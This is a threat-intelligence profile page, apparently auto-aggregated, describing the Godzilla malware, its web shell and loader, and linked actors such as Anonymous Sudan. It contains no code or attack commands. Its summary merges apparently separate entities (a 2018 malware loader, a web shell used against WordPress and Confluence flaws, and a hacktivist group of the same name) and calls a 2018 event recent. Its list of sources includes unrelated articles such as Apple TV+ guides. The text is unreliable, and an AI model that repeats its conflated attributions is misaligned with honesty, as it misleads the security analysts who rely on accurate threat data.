Godzilla

Malware Profile Updated 13 days ago
Download STIX
Preview STIX
"Godzilla" is a potent malware that has been active in the cybercrime landscape since at least 2018. This malicious software allows attackers to remotely control compromised servers, execute arbitrary commands, manipulate databases, and perform other harmful activities. The malware is often deployed through vulnerabilities in popular software, such as WordPress plugins, allowing unauthorized access to systems. Notably, on March 6, 2024, hackers exploited a vulnerability in the WordPress Plugin 3DPrint Lite (CVE-2021-4436) to deploy the notorious Godzilla Web Shell. The sophistication of the Godzilla malware continues to evolve with the inclusion of an intermediary loader, known as the Godzilla Loader, and obfuscation of key elements in the binary. The payload distributed by Godzilla Loader has been used in multiple campaigns to distribute other malware types like Dridex, Trickbot, and Panda Banker. This tool is sold in underground forums, further proliferating its use among cybercriminals. Following a significant incident, several hacktivist groups including Skynet, Godzilla, and Anonymous Sudan claimed responsibility. Most attacks involving Godzilla have targeted Confluence, loading the "infamous" Godzilla Web shell. As of late, one of the domains associated with Godzilla Loader was observed distributing InnaputRAT in late March 2018. Given these developments, it's clear that Godzilla represents a persistent and evolving threat in the digital security landscape.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Godzilla Web Shell
3
The Godzilla Web Shell is a form of malware, designed to exploit and damage computer systems. It infiltrates systems through suspicious downloads, emails, or websites and can cause significant harm once inside. This includes stealing personal information, disrupting operations, or even holding data
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Web Shell
Activemq
Vulnerability
Loader
Payload
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
Anonymous SudanUnspecified
2
Anonymous Sudan, a threat actor group, has been identified as the malicious entity behind several notable Distributed Denial of Service (DDoS) attacks. A threat actor can be an individual, a private company, or part of a government entity that executes actions with malicious intent. Anonymous Sudan'
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Source Document References
Information about the Godzilla Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
CISA
a year ago
MAR-10400779-1.v1 – Zimbra 1 | CISA
Securityaffairs
4 months ago
Threat actors exploit Apache ActiveMQ flaw to deliver the Godzilla Web Shell
MITRE
a year ago
Innaput Actors Utilize Remote Access Trojan Since 2016, Presumably Targeting Victim Files | NETSCOUT
DARKReading
4 months ago
Godzilla Web Shell Attacks Stomp on Critical Apache ActiveMQ Flaw
CERT-EU
2 months ago
Hackers Exploit WordPress Plugin Flaw to Deploy Godzilla Web Shell
DARKReading
2 months ago
Stealth Bomber: Atlassian Confluence Exploits Drop Web Shells In-Memory
Securityaffairs
6 months ago
After ChatGPT, Anonymous Sudan took down Cloudflare website
Checkpoint
a year ago
Rhadamanthys: The “Everything Bagel” Infostealer - Check Point Research
CERT-EU
3 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU
6 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU
a year ago
Flea APT’s latest campaign targets foreign affairs ministries with new Graphican backdoor
CERT-EU
5 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU
3 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU
5 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU
2 months ago
Technical Glitch Causes Global Disruption for Meta Users
CERT-EU
4 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus
CERT-EU
9 months ago
The Morning After: ‘GTA VI’ hacker leaked game footage with a Fire TV Stick | Engadget
CERT-EU
2 months ago
Apple TV+ shows and movies: What to watch on Apple TV Plus